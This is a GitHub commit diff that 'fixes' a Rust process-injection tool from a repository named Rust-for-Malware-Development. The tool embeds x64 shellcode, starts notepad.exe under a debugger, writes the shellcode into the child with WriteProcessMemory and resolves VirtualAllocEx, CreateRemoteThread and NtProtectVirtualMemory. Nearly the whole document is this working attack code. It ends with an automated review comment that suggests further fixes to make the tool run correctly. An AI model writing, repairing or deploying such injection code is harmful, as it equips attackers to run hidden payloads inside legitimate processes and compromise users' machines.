
Commit 041bbfb

committed
Fixed Process Hypnosis
1 parent e958dac commit 041bbfb


1 file changed

+103
-81
lines changed


Process/hypnosis.rs

Lines changed: 103 additions & 81 deletions
@@ -1,30 +1,24 @@
1-
21
/*
3-
Process_Hypnosis [Beta]
2+
Process_Hypnosis [Fixed]
43
For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
4+
References used:
5+
https://github.com/CarlosG13/Process-Hypnosis-Debugger-assisted-control-flow-hijack.git
6+
https://github.com/joaoviictorti/RustRedOps/tree/main/Process_Hypnosis
7+
58
@5mukx
69
710
*/
811

9-
10-
// Please Note: I Have been trying for hours to find the error occuring at ReadProcessMemory(1). So if
11-
// Anyone Finds it. Please dm me. I will try my best to research and Fix ASAP >! Luv u ALL ...
12-
1312
use std::{ffi::OsStr, os::windows::ffi::OsStrExt, ptr::null_mut};
1413

15-
// use widestring::U16String;
16-
// ConvertThreadToFiber(null_mut());
17-
// SwitchToFiber(fiber_addr);
18-
// }
19-
// }
2014
use winapi::{
21-
ctypes::{c_char, c_uchar, c_void},
15+
ctypes::{c_char, c_void},
2216
um::{debugapi::{ContinueDebugEvent, DebugActiveProcessStop, WaitForDebugEvent},
2317
errhandlingapi::GetLastError,
2418
memoryapi::{ReadProcessMemory, WriteProcessMemory},
2519
minwinbase::{DEBUG_EVENT, EXCEPTION_BREAKPOINT, LOAD_DLL_DEBUG_EVENT},
26-
processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW}
27-
}};
20+
processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW}}
21+
};
2822

2923
macro_rules! okey {
3024
($msg:expr, $($arg:expr), *) => {
@@ -43,8 +37,6 @@ macro_rules! error {
4337
type BOOL = i32;
4438
type HANDLE = *mut c_void;
4539

46-
use windows_sys::core::s;
47-
4840
fn main(){
4941
let shellcode: [u8; 276] = [
5042
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
@@ -66,7 +58,7 @@ fn main(){
6658
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
6759
0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
6860
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
69-
];
61+
];
7062

7163
unsafe{
7264
let mut debug_info: DEBUG_EVENT = std::mem::zeroed();
@@ -76,61 +68,51 @@ fn main(){
7668

7769
let mut process_info: PROCESS_INFORMATION = std::mem::zeroed();
7870

79-
// let path_name = U16String::from_str(r#"C:\Windows\Systen32\calc.exe"#);
80-
// let mut path_name:Vec<u16> = "C:\\Windows\\Systen32\\notepad.exe\0".encode_utf16().collect();
81-
// let path_name:Vec<u16> = OsStr::new("C\\Windows\\System32\\notepad.exe")
82-
// .encode_wide().chain(Some(0).into_iter()).collect();
83-
8471
let path_name: Vec<u16> = OsStr::new("C:\\Windows\\System32\\notepad.exe")
85-
.encode_wide()
86-
.chain(std::iter::once(0))
87-
.collect();
88-
89-
// let cmd_line_ptr = cmd_line.as_ptr();
72+
.encode_wide()
73+
.chain(std::iter::once(0))
74+
.collect();
9075

9176
let create_process = CreateProcessW(
9277
null_mut(),
9378
path_name.as_ptr() as *mut u16,
9479
null_mut(),
9580
null_mut(),
9681
0,
97-
// DEBUG_ONLY_THIS_PROCESS as u32, // DEBUG_ONLY_THIS_PROCESS 0x00000002
9882
winapi::um::winbase::DEBUG_ONLY_THIS_PROCESS,
9983
null_mut(),
10084
null_mut(),
10185
&mut startup_info,
10286
&mut process_info,
10387
);
104-
10588

10689
if create_process == 0{
10790
println!("Break 1");
108-
error!("CreateProcessW Failed: {}",GetLastError());
91+
error!("CreateProcessW Failed: {}", GetLastError());
10992
}
110-
// println!("Break 2");
11193

112-
for num in 0..7{
113-
if WaitForDebugEvent(&mut debug_info, 0xFFFFFFFF) != 0{
94+
for num in 0..7 {
95+
if WaitForDebugEvent(&mut debug_info, 0xFFFFFFFF) != 0 {
11496

115-
match debug_info.dwDebugEventCode{
97+
match debug_info.dwDebugEventCode {
11698
3 => { // CREATE_PROCESS_DEBUG_EVENT
117-
okey!("Process PID: {}",debug_info.dwProcessId);
118-
okey!("Thread ID: {}",debug_info.dwThreadId);
99+
okey!("Process PID: {}", debug_info.dwProcessId);
100+
okey!("Thread ID: {}", debug_info.dwThreadId);
119101
okey!("StartAddress: {:?}", debug_info.u.CreateProcessInfo().lpStartAddress.unwrap());
120-
okey!("Main Thread: {:?}",debug_info.u.CreateProcessInfo().hThread);
102+
okey!("Main Thread: {:?}", debug_info.u.CreateProcessInfo().hThread);
121103
},
122104

123105
2 => { // CREATE_THREAD_DEBUG_EVENT
124106
println!();
125107
okey!("Thread Created: {:?}", debug_info.u.CreateThread().lpStartAddress);
126-
okey!("Thread Handle: {:?}",debug_info.u.CreateProcessInfo().hThread);
127-
okey!("Thread ThreadLocalBase: {:?}",debug_info.u.CreateThread().lpThreadLocalBase);
108+
okey!("Thread Handle: {:?}", debug_info.u.CreateThread().hThread);
109+
okey!("Thread ThreadLocalBase: {:?}", debug_info.u.CreateThread().lpThreadLocalBase);
128110
},
129111

130-
LOAD_DLL_DEBUG_EVENT => { // LOAD_DLL_DEBUG_EVENT // 6
112+
LOAD_DLL_DEBUG_EVENT => { // LOAD_DLL_DEBUG_EVENT
131113
let mut buffer = [0u8; std::mem::size_of::<*mut c_void>()];
132114
let mut return_number = 0;
133-
115+
134116
let success = ReadProcessMemory(
135117
process_info.hProcess,
136118
debug_info.u.LoadDll().lpImageName as *mut c_void,
@@ -139,28 +121,25 @@ fn main(){
139121
&mut return_number,
140122
);
141123

142-
// println!(" --> {:?}",debug_info.u.LoadDll().lpImageName);
143-
if success == 0{
144-
error!("ReadProcessMemory(1) Failed: {}",GetLastError());
124+
if success == 0 {
125+
error!("ReadProcessMemory(1) Failed: {}", GetLastError());
145126
}
146127

147-
println!();
148-
149128
let dll_address = usize::from_ne_bytes(buffer) as *mut c_void;
150129
let mut image_name = vec![0u16; 260];
151-
130+
152131
okey!("DLL ADDRESS: {:?}", dll_address);
153132

154133
let success = ReadProcessMemory(
155134
process_info.hProcess,
156135
dll_address,
157136
image_name.as_mut_ptr() as _,
158-
image_name.len(),
137+
image_name.len() * std::mem::size_of::<u16>(),
159138
&mut return_number,
160139
);
161140

162-
if success == 0{
163-
error!("ReadProcessMemory(2) Failed: {}",GetLastError());
141+
if success == 0 {
142+
error!("ReadProcessMemory(2) Failed: {}", GetLastError());
164143
}
165144

166145
if let Some(first_null) = image_name.iter().position(|&c| c == 0) {
@@ -171,17 +150,15 @@ fn main(){
171150
okey!("DLL Name: {}", dll_name.trim_end_matches('\0'));
172151
okey!("DLL Base Address: {:?}", debug_info.u.LoadDll().lpBaseOfDll);
173152
okey!("DLL H_File: {:?}", debug_info.u.LoadDll().hFile);
174-
175153
},
176154

177155
1 => { //EXCEPTION_DEBUG_EVENT
178156
if debug_info.u.Exception().ExceptionRecord.ExceptionCode == EXCEPTION_BREAKPOINT {
179-
okey!("BreakPoint Successfully Triggered {}",'!');
157+
okey!("BreakPoint Successfully Triggered {}", '!');
180158
}
181-
},
159+
},
182160

183161
_ => {}
184-
185162
}
186163

187164
if num == 6 {
@@ -194,27 +171,26 @@ fn main(){
194171
&mut number_of_write,
195172
);
196173

197-
if success == 0{
198-
error!("WriteProcessMemory Failed: {}",GetLastError());
174+
if success == 0 {
175+
error!("WriteProcessMemory Failed: {}", GetLastError());
199176
}
200177

201178
let active_proc = DebugActiveProcessStop(process_info.dwProcessId);
202179

203-
if active_proc == 0{
204-
error!("DebugActiveProcessStop Failed: {}",GetLastError());
180+
if active_proc == 0 {
181+
error!("DebugActiveProcessStop Failed: {}", GetLastError());
205182
}
206183
}
207184

208-
209185
if num < 6 {
210186
let dbg_continue = ContinueDebugEvent(
211187
process_info.dwProcessId,
212188
process_info.dwThreadId,
213189
0x00010002, // DBG_CONTINUE
214190
);
215-
216-
if dbg_continue == 0{
217-
error!("ContinueDebugEvent Failed: {}",GetLastError());
191+
192+
if dbg_continue == 0 {
193+
error!("ContinueDebugEvent Failed: {}", GetLastError());
218194
}
219195
}
220196
}
@@ -226,68 +202,69 @@ fn main(){
226202
1
227203
);
228204

229-
if sym_success == 0{
230-
error!("SymInitialize Error: {}",GetLastError());
205+
if sym_success == 0 {
206+
error!("SymInitialize Error: {}", GetLastError());
231207
}
232208

233209
let mut symbol: SYMBOL_INFO = std::mem::zeroed();
234210
symbol.SizeOfStruct = std::mem::size_of::<SYMBOL_INFO>() as u32;
235211

236-
212+
let virtual_alloc_addr: Vec<_> = "VirtualAllocEx".encode_utf16().collect();
237213
let success = SymFromName(
238214
0xffffffffffffffffu64 as _,
239-
s!("VirtualAllocEx"),
215+
virtual_alloc_addr.as_ptr(),
240216
&mut symbol
241217
);
242218

243-
if success == 0{
244-
error!("SymFromName Failed: {:?}",GetLastError());
219+
if success == 0 {
220+
error!("SymFromName Failed: {:?}", GetLastError());
245221
}
246222

247223
okey!("Example Addr of VirtualAllocEx: {:?}", symbol.Address as *mut c_void);
248224

225+
let create_remote_thread: Vec<_> = "CreateRemoteThread".encode_utf16().collect();
249226
let success = SymFromName(
250227
0xffffffffffffffffu64 as _,
251-
s!("CreateRemoteThread"),
228+
create_remote_thread.as_ptr(),
252229
&mut symbol
253230
);
254231

255-
if success == 0{
256-
error!("SymFromName Failed: {:?}",GetLastError());
232+
if success == 0 {
233+
error!("SymFromName Failed: {:?}", GetLastError());
257234
}
258235

259236
okey!("Example Addr of CreateRemoteThread: {:?}", symbol.Address as *mut c_void);
260237

238+
let nt_protect_memory: Vec<_> = "NtProtectVirtualMemory".encode_utf16().collect();
261239
let success = SymFromName(
262240
0xffffffffffffffffu64 as _,
263-
s!("NtProtectVirtualMemory"),
241+
// s!("NtProtectVirtualMemory"),
242+
nt_protect_memory.as_ptr(),
264243
&mut symbol
265244
);
266245

267-
if success == 0{
268-
error!("SymFromName Failed: {:?}",GetLastError());
246+
if success == 0 {
247+
error!("SymFromName Failed: {:?}", GetLastError());
269248
}
270249

271250
okey!("Example Addr of NtProtectVirtualMemory: {:?}", symbol.Address as *mut c_void);
272251
}
273-
274252
}
275253

276-
277254
#[link(name = "Dbghelp")]
278255
#[allow(non_snake_case)]
279256
extern "system" {
280257
pub fn SymInitialize(
281258
hProcess: HANDLE,
282-
UserSearchPath: *const c_char , // *const c_char
259+
UserSearchPath: *const c_char,
283260
fInvadeProcess: BOOL,
284261
) -> BOOL;
285262
}
286263

287264
extern "system" {
288265
pub fn SymFromName(
289266
hprocess: HANDLE,
290-
name: *const c_uchar,
267+
name: *const u16,
291268
symbol: *mut SYMBOL_INFO
292269
) -> BOOL;
293270
}
@@ -299,7 +276,6 @@ pub struct SYMBOL_INFO_FLAGS(pub u32);
299276
#[allow(non_snake_case,non_camel_case_types)]
300277
#[repr(C)]
301278
pub struct SYMBOL_INFO {
302-
303279
pub SizeOfStruct: u32,
304280
pub TypeIndex: u32,
305281
pub Reserved: [u64; 2],
@@ -319,6 +295,52 @@ pub struct SYMBOL_INFO {
319295

320296
#[repr(transparent)]
321297
#[allow(non_camel_case_types)]
322-
pub struct PROCESS_CREATION_FLAGS(pub u32);
298+
pub struct HANDLE_FLAGS(pub u32);
323299

324-
pub const DEBUG_ONLY_THIS_PROCESS: PROCESS_CREATION_FLAGS = PROCESS_CREATION_FLAGS(0x00000002);
300+
#[repr(transparent)]
301+
#[allow(non_camel_case_types)]
302+
pub struct MEMORY_INFORMATION_CLASS(pub u32);
303+
304+
#[repr(transparent)]
305+
#[allow(non_camel_case_types)]
306+
pub struct PVOID(pub *mut c_void);
307+
308+
#[repr(transparent)]
309+
#[allow(non_camel_case_types)]
310+
pub struct PSIZE_T(pub *mut usize);
311+
312+
#[repr(transparent)]
313+
#[allow(non_camel_case_types)]
314+
pub struct PROCESSINFOCLASS(pub u32);
315+
316+
#[repr(transparent)]
317+
#[allow(non_camel_case_types)]
318+
pub struct SECTION_INHERIT(pub u32);
319+
320+
#[repr(transparent)]
321+
#[allow(non_camel_case_types)]
322+
pub struct SIZE_T(pub usize);
323+
324+
#[repr(transparent)]
325+
#[allow(non_camel_case_types)]
326+
pub struct ULONG(pub u32);
327+
328+
#[repr(transparent)]
329+
#[allow(non_camel_case_types)]
330+
pub struct ULONG_PTR(pub usize);
331+
332+
#[repr(transparent)]
333+
#[allow(non_camel_case_types)]
334+
pub struct ULONG64(pub u64);
335+
336+
#[repr(transparent)]
337+
#[allow(non_camel_case_types)]
338+
pub struct USHORT(pub u16);
339+
340+
#[repr(transparent)]
341+
#[allow(non_camel_case_types)]
342+
pub struct WCHAR(pub u16);
343+
344+
#[repr(transparent)]
345+
#[allow(non_camel_case_types)]
346+
pub struct WORD(pub u16);
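Review bot: The wide strings handed to `SymFromName` in the `@@ -226,68 +202,69 @@` hunk (`virtual_alloc_addr`, `create_remote_thread`, `nt_protect_memory`) are built with `.encode_utf16().collect()` and carry no terminating 0, so the callee will scan past the end of each `Vec<u16>` looking for one — an out-of-bounds read in the program's own heap; `path_name` earlier in the file already shows the intended pattern, `.chain(std::iter::once(0))`. The extern declaration at new line 267 now types `name` as `*const u16`, but the export named `SymFromName` in Dbghelp takes a narrow C string, so the declared ABI and the linked symbol no longer agree and should be reconciled, and the `extern "system"` block deserves a `// SAFETY:` comment stating the expected encoding and NUL termination so callers of these `unsafe` fns know the contract. The newtypes added at new lines 298–346 (`HANDLE_FLAGS` through `WORD`) are not referenced anywhere in the visible diff; if nothing else in the file uses them they are dead declarations that could be dropped, or each given a one-line `///` doc comment saying what it models. `main` begins and ends outside this hunk, and the `#[link(name = "Dbghelp")]` attribute applies only to the first extern block, not to the one declaring `SymFromName`.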
